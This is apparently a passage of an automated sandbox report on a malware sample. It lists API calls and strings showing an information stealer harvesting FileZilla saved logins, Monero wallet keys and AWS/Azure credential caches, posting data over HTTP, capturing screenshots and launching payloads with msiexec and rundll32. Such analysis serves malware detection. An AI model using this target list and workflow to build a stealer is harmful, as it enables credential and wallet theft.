                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00880DB2), ref: 00870532
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00880DB2), ref: 0087054A
                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00870562
                        • lstrcat.KERNEL32(?,profile: null), ref: 00870571
                        • lstrcat.KERNEL32(?,url: ), ref: 00870580
                        • lstrcat.KERNEL32(?,00000000), ref: 00870593
                        • lstrcat.KERNEL32(?,00881678), ref: 008705A2
                        • lstrcat.KERNEL32(?,00000000), ref: 008705B5
                        • lstrcat.KERNEL32(?,0088167C), ref: 008705C4
                        • lstrcat.KERNEL32(?,login: ), ref: 008705D3
                        • lstrcat.KERNEL32(?,00000000), ref: 008705E6
                        • lstrcat.KERNEL32(?,00881688), ref: 008705F5
                        • lstrcat.KERNEL32(?,password: ), ref: 00870604
                        • lstrcat.KERNEL32(?,00000000), ref: 00870617
                        • lstrcat.KERNEL32(?,00881698), ref: 00870626
                        • lstrcat.KERNEL32(?,0088169C), ref: 00870635
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00880DB2), ref: 0087068E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 1942843190-555421843
                        • Opcode ID: c03728c1a2f9e2c962cf21609d0a15d2d4eeebfe899832c351f3171819f76fc8
                        • Instruction ID: 073ddb67db184c524a1b8bd213747d9e6cdfd31f7df309311a87d51890b004f4
                        • Opcode Fuzzy Hash: c03728c1a2f9e2c962cf21609d0a15d2d4eeebfe899832c351f3171819f76fc8
                        • Instruction Fuzzy Hash: 46D10F719001099BCB08EBF8DD96DEE7778FB54700F448518F116E6199EF34EA46CB62
                        APIs
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                          • Part of subcall function 008647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00864839
                          • Part of subcall function 008647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00864849
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008659F8
                        • StrCmpCA.SHLWAPI(?,0116ED88), ref: 00865A13
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00865B93
                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0116ED98,00000000,?,0116A9E8,00000000,?,00881A1C), ref: 00865E71
                        • lstrlen.KERNEL32(00000000), ref: 00865E82
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00865E93
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00865E9A
                        • lstrlen.KERNEL32(00000000), ref: 00865EAF
                        • lstrlen.KERNEL32(00000000), ref: 00865ED8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00865EF1
                        • lstrlen.KERNEL32(00000000,?,?), ref: 00865F1B
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00865F2F
                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00865F4C
                        • InternetCloseHandle.WININET(00000000), ref: 00865FB0
                        • InternetCloseHandle.WININET(00000000), ref: 00865FBD
                        • HttpOpenRequestA.WININET(00000000,0116EDA8,?,0116E750,00000000,00000000,00400100,00000000), ref: 00865BF8
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                        • InternetCloseHandle.WININET(00000000), ref: 00865FC7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 874700897-2180234286
                        • Opcode ID: ba03ac144b5aa7c9d4a95143c60b98ec366fb06883dc6acae8e1c6c5098afee8
                        • Instruction ID: ed2bebc3df0acc361e623ae80c658578e6d4856326882d629f8ef20f698da332
                        • Opcode Fuzzy Hash: ba03ac144b5aa7c9d4a95143c60b98ec366fb06883dc6acae8e1c6c5098afee8
                        • Instruction Fuzzy Hash: 3D12F171820118ABDB19EBA4DC95FEEB378FF54700F508169B11AE2095DF706A4ACF53
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                          • Part of subcall function 00878B60: GetSystemTime.KERNEL32(00880E1A,0116ABF8,008805AE,?,?,008613F9,?,0000001A,00880E1A,00000000,?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 00878B86
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0086CF83
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0086D0C7
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0086D0CE
                        • lstrcat.KERNEL32(?,00000000), ref: 0086D208
                        • lstrcat.KERNEL32(?,00881478), ref: 0086D217
                        • lstrcat.KERNEL32(?,00000000), ref: 0086D22A
                        • lstrcat.KERNEL32(?,0088147C), ref: 0086D239
                        • lstrcat.KERNEL32(?,00000000), ref: 0086D24C
                        • lstrcat.KERNEL32(?,00881480), ref: 0086D25B
                        • lstrcat.KERNEL32(?,00000000), ref: 0086D26E
                        • lstrcat.KERNEL32(?,00881484), ref: 0086D27D
                        • lstrcat.KERNEL32(?,00000000), ref: 0086D290
                        • lstrcat.KERNEL32(?,00881488), ref: 0086D29F
                        • lstrcat.KERNEL32(?,00000000), ref: 0086D2B2
                        • lstrcat.KERNEL32(?,0088148C), ref: 0086D2C1
                        • lstrcat.KERNEL32(?,00000000), ref: 0086D2D4
                        • lstrcat.KERNEL32(?,00881490), ref: 0086D2E3
                          • Part of subcall function 0087A820: lstrlen.KERNEL32(00864F05,?,?,00864F05,00880DDE), ref: 0087A82B
                          • Part of subcall function 0087A820: lstrcpy.KERNEL32(00880DDE,00000000), ref: 0087A885
                        • lstrlen.KERNEL32(?), ref: 0086D32A
                        • lstrlen.KERNEL32(?), ref: 0086D339
                          • Part of subcall function 0087AA70: StrCmpCA.SHLWAPI(01169518,0086A7A7,?,0086A7A7,01169518), ref: 0087AA8F
                        • DeleteFileA.KERNEL32(00000000), ref: 0086D3B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                        • String ID:
                        • API String ID: 1956182324-0
                        • Opcode ID: 9d87d5a5cba43458b06957e556bbb9358ee3b206b34518c18842842e577116d0
                        • Instruction ID: 060f390fccc4c0f9d3046b5faddf913f68d94ef5860c3a572f8d720e96d722b7
                        • Opcode Fuzzy Hash: 9d87d5a5cba43458b06957e556bbb9358ee3b206b34518c18842842e577116d0
                        • Instruction Fuzzy Hash: FCE1ED71910109ABCB08EBE4DD96EEE7378FF64301F108168F51AE6195DF35AA06CB63
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0116D950,00000000,?,0088144C,00000000,?,?), ref: 0086CA6C
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0086CA89
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0086CA95
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0086CAA8
                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0086CAD9
                        • StrStrA.SHLWAPI(?,0116D9F8,00880B52), ref: 0086CAF7
                        • StrStrA.SHLWAPI(00000000,0116DA28), ref: 0086CB1E
                        • StrStrA.SHLWAPI(?,0116E078,00000000,?,00881458,00000000,?,00000000,00000000,?,01169398,00000000,?,00881454,00000000,?), ref: 0086CCA2
                        • StrStrA.SHLWAPI(00000000,0116E2F8), ref: 0086CCB9
                          • Part of subcall function 0086C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0086C871
                          • Part of subcall function 0086C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0086C87C
                        • StrStrA.SHLWAPI(?,0116E2F8,00000000,?,0088145C,00000000,?,00000000,01169468), ref: 0086CD5A
                        • StrStrA.SHLWAPI(00000000,01169678), ref: 0086CD71
                          • Part of subcall function 0086C820: lstrcat.KERNEL32(?,00880B46), ref: 0086C943
                          • Part of subcall function 0086C820: lstrcat.KERNEL32(?,00880B47), ref: 0086C957
                          • Part of subcall function 0086C820: lstrcat.KERNEL32(?,00880B4E), ref: 0086C978
                        • lstrlen.KERNEL32(00000000), ref: 0086CE44
                        • CloseHandle.KERNEL32(00000000), ref: 0086CE9C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                        • String ID:
                        • API String ID: 3744635739-3916222277
                        • Opcode ID: e3f6d07d52772a28e09a6025c0c11d11bfa486b1950729c7f13f8ea4a307974c
                        • Instruction ID: 1e8f3c4daa0319820f857b25083e9228945b35430bcee74d6f2fc1a0a66fecd3
                        • Opcode Fuzzy Hash: e3f6d07d52772a28e09a6025c0c11d11bfa486b1950729c7f13f8ea4a307974c
                        • Instruction Fuzzy Hash: 74E11271800109ABDB19EBA4DC95FEEB778FF54300F008169F51AE6195DF34AA4ACB63
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                        • RegOpenKeyExA.ADVAPI32(00000000,0116B920,00000000,00020019,00000000,008805B6), ref: 008783A4
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00878426
                        • wsprintfA.USER32 ref: 00878459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0087847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 0087848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 00878499
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                        • String ID: - $%s\%s$?
                        • API String ID: 3246050789-3278919252
                        • Opcode ID: e0c25b46609d05120503ddb1dc4780a7689a12ebd5ebc14f980f7b19b544dc79
                        • Instruction ID: 23c4277d34e4b3c3d07ca6caeba01401a380d59c4288a312702707f4e4f3c8be
                        • Opcode Fuzzy Hash: e0c25b46609d05120503ddb1dc4780a7689a12ebd5ebc14f980f7b19b544dc79
                        • Instruction Fuzzy Hash: 1F810D71910118ABDB68DB54CC95FEE77B8FF58700F00C298E11AA6184DF75AB86CF92
                        APIs
                          • Part of subcall function 00878DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00878E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00874DB0
                        • lstrcat.KERNEL32(?,\.azure\), ref: 00874DCD
                          • Part of subcall function 00874910: wsprintfA.USER32 ref: 0087492C
                          • Part of subcall function 00874910: FindFirstFileA.KERNEL32(?,?), ref: 00874943
                        • lstrcat.KERNEL32(?,00000000), ref: 00874E3C
                        • lstrcat.KERNEL32(?,\.aws\), ref: 00874E59
                          • Part of subcall function 00874910: StrCmpCA.SHLWAPI(?,00880FDC), ref: 00874971
                          • Part of subcall function 00874910: StrCmpCA.SHLWAPI(?,00880FE0), ref: 00874987
                          • Part of subcall function 00874910: FindNextFileA.KERNEL32(000000FF,?), ref: 00874B7D
                          • Part of subcall function 00874910: FindClose.KERNEL32(000000FF), ref: 00874B92
                        • lstrcat.KERNEL32(?,00000000), ref: 00874EC8
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00874EE5
                          • Part of subcall function 00874910: wsprintfA.USER32 ref: 008749B0
                          • Part of subcall function 00874910: StrCmpCA.SHLWAPI(?,008808D2), ref: 008749C5
                          • Part of subcall function 00874910: wsprintfA.USER32 ref: 008749E2
                          • Part of subcall function 00874910: PathMatchSpecA.SHLWAPI(?,?), ref: 00874A1E
                          • Part of subcall function 00874910: lstrcat.KERNEL32(?,0116EE98), ref: 00874A4A
                          • Part of subcall function 00874910: lstrcat.KERNEL32(?,00880FF8), ref: 00874A5C
                          • Part of subcall function 00874910: lstrcat.KERNEL32(?,?), ref: 00874A70
                          • Part of subcall function 00874910: lstrcat.KERNEL32(?,00880FFC), ref: 00874A82
                          • Part of subcall function 00874910: lstrcat.KERNEL32(?,?), ref: 00874A96
                          • Part of subcall function 00874910: CopyFileA.KERNEL32(?,?,00000001), ref: 00874AAC
                          • Part of subcall function 00874910: DeleteFileA.KERNEL32(?), ref: 00874B31
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 949356159-974132213
                        • Opcode ID: 29ee20e837e2989f4959644b228f8e5dee054a6c5f994525032e2f3b997c64b5
                        • Instruction ID: 62d3c4a83dee4199732342bcc367922a01b1006912664bcb8f0be5d41c2b738d
                        • Opcode Fuzzy Hash: 29ee20e837e2989f4959644b228f8e5dee054a6c5f994525032e2f3b997c64b5
                        • Instruction Fuzzy Hash: 4341607A94020466CB54F760DC8BFED7678FB64700F004454B29AE61C5EEB89B8ACB93
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0087906C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateGlobalStream
                        • String ID: image/jpeg
                        • API String ID: 2244384528-3785015651
                        • Opcode ID: 955d1d4a3eda1b7cb55b65707605b4ff07c2f5ca42e45f48413641ddfdf5bf20
                        • Instruction ID: 6a0ff4457fd288af608d60ee8b8ff7b1f4bdf511965e3926438ef34fa0a91c2e
                        • Opcode Fuzzy Hash: 955d1d4a3eda1b7cb55b65707605b4ff07c2f5ca42e45f48413641ddfdf5bf20
                        • Instruction Fuzzy Hash: DB71CB75910209ABDB04EBE4DC89FEEB7B8FB58700F148518F516E7294DB34E905CB62
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                        • ShellExecuteEx.SHELL32(0000003C), ref: 008731C5
                        • ShellExecuteEx.SHELL32(0000003C), ref: 0087335D
                        • ShellExecuteEx.SHELL32(0000003C), ref: 008734EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell$lstrcpy
                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                        • API String ID: 2507796910-3625054190
                        • Opcode ID: 4d6a71bf9ca276a633571df1f5bd1a51e82cd7119ae1d74dadb514cd6f195410
                        • Instruction ID: 9898c94f09cc993c22b0e17e39caa8963a36926e2e36d697b0dbfb2470df7dfa
                        • Opcode Fuzzy Hash: 4d6a71bf9ca276a633571df1f5bd1a51e82cd7119ae1d74dadb514cd6f195410
                        • Instruction Fuzzy Hash: FE12E0718001089ADB19FBA4DC92FDEB778FF54300F508169E51AA6199EF34AB4ACF53
                        APIs
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                          • Part of subcall function 00866280: InternetOpenA.WININET(00880DFE,00000001,00000000,00000000,00000000), ref: 008662E1
                          • Part of subcall function 00866280: StrCmpCA.SHLWAPI(?,0116ED88), ref: 00866303
                          • Part of subcall function 00866280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00866335
                          • Part of subcall function 00866280: HttpOpenRequestA.WININET(00000000,GET,?,0116E750,00000000,00000000,00400100,00000000), ref: 00866385
                          • Part of subcall function 00866280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008663BF
                          • Part of subcall function 00866280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008663D1
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00875318
                        • lstrlen.KERNEL32(00000000), ref: 0087532F
                          • Part of subcall function 00878E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00878E52
                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00875364
                        • lstrlen.KERNEL32(00000000), ref: 00875383
                        • lstrlen.KERNEL32(00000000), ref: 008753AE
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 3240024479-1526165396
                        • Opcode ID: 98f736806e4e6253e22fd68756b9da6f4171b28df0c997bf2db9d4b4327dd6b5
                        • Instruction ID: ba1d48de870bff2be0d247e3d5cfbd4ec25cfd20eae8704ddbf1f3290356fc03
